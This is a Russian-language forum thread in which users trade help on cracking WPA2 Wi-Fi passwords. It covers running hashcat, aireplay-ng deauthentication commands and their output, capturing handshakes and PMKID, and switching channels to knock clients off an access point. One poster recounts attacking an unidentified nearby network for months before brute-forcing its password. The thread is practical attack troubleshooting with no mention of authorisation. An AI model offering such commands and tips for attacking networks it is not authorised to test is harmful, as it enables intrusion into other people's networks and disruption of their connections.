Добра и мира! Столкнулся с такой проблемой на железе (Ryzen 3 3200G, Radeon RX-580) под управлением Win 10. hashcat (6.2) ни в какую не запускается ни через cmd ни через PowerShell. Прошу помощи и советов. Спасибо!
У тебя комп ругается на .exe файл. Возможно ты скачал не тот архив. Скачай этот и распакуй. https://hashcat.net/files/hashcat-6.2.5.7z Я запускаю не через powershall. Делаю проще. Ну это я так считаю для себя. В левом нижнем углу. Пуск, найти cmd Потом скопируй в папку с котом и запусти командную строку. Ну а дальше проверь hashcat.exe -I
Возможно прочитанный мной мануал перехвата хэндшейка ошибочен? Пробую атаку деаутентификации. ┌──(root㉿kali)-[~] └─# aireplay-ng -0 5 -a 68:FF:7B:7EA:93 wlan0 14:32:07 Waiting for beacon frame (BSSID: 68:FF:7B:7EA:93) on channel 5 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 14:32:07 Sending DeAuth (code 7) to broadcast -- BSSID: [68:FF:7B:7EA:93] 14:32:08 Sending DeAuth (code 7) to broadcast -- BSSID: [68:FF:7B:7EA:93] 14:32:08 Sending DeAuth (code 7) to broadcast -- BSSID: [68:FF:7B:7EA:93] 14:32:09 Sending DeAuth (code 7) to broadcast -- BSSID: [68:FF:7B:7EA:93] 14:32:09 Sending DeAuth (code 7) to broadcast -- BSSID: [68:FF:7B:7EA:93] ┌──(root㉿kali)-[~] └─# aireplay-ng -0 5 -a -c 68:FF:7B:7EA:93 wlan0 Invalid AP MAC address. "aireplay-ng --help" for help. ┌──(root㉿kali)-[~] └─# aireplay-ng -0 5 -c 68:FF:7B:7EA:93 wlan0 14:33:22 Please specify at least a BSSID (-a) or an ESSID (-e)
Значит у тебя может быть несколько проблем. Роутер находится далеко. Между тобой и роутером находится клиент которого ты пытаешься отключить.Либо этим вайфаем ни кто не пользуется. Просто установлен роутер и к нему подключен проводом комп. Плохой адаптер. Может быть что то ещё... Попробуй перехватить PMKID. У меня был курьёзный случай. Я при сканировании сетей обнаружил в своём доме точку доступа под названием LINK . Я делал разные атаки на неё в течении нескольких месяцев. Была у меня мысль что это точка провайдера. В итоге спустя очень долгое время мне удалось поймать PMKID. Когда я сбрутил пасс , он мне показался очень знакомым. Я собрал всех своих домашних и спросил, чей пасс? Ни кто не мог вспомнить. Тогда я вооружился и пошёл искать по дому. В итоге нашёл под шифонером включеный роутер, который там провалялся много лет. Он остался ещё от старого провайдера. Он просто был включен врозетку, но к нему небыло подключено вообще ни чего.
Адаптер ALFA видно более 20 wi-fi сетей wpa2. В репо кали 2022.3 отсутствует hcxdumptool. У кого получается напишите версию ос и модель адаптера.
Атака PMKID не получилась: Может быть у меня адаптер устаревший, кто нибудь пользуется alfa awus036nhr v.2?
У меня на винде с 3090ti скорость перебора в EWSA около 1.1кк, а в последнем Hashcat обычно около 850к (-w 4). Если смотреть на график загрузки гпу, то в случае с евсой там ровный стабильный график 98-100% и потребление в районе 280вт, а в случае с котом прерывистая нагрузка и потребление максимум 245вт. Почему так? Можно как-то стабилизировать скорость перебора котом? Дрова последние GDR и куда тулкит.
Запустил перехват траффика: Code: airodump-ng wlan0mon -w sweethome Увидел в выводе интересную точку и, не прерывая исполнение airodump-ng, командую деаутентификацию: Code: root@porteus:~# aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon 01:32:01 Waiting for beacon frame (BSSID: AA:BB:CC:DD:EE:FF) on channel 12 01:32:03 wlan0mon is on channel 12, but the AP uses channel 11 Как можно в таком случае скинуть клиента и поймать его хендшейк?
Точку которую ты пытаешься поймать находится на другом канале. Тут в любом случае нужно менять канал . ifconfig wlan0mon up iwconfig wlan0mon channel 11
А как это совместить с перехватом остальных точек на других каналах? И как быть если сама точка скачет по каналам?
Ты не можешь перехватывать сразу все точки. Перехватывай только одну которую выбрал. Выбирай канал на котором находится точка этой командой. ifconfig wlan0mon up iwconfig wlan0mon channel xx
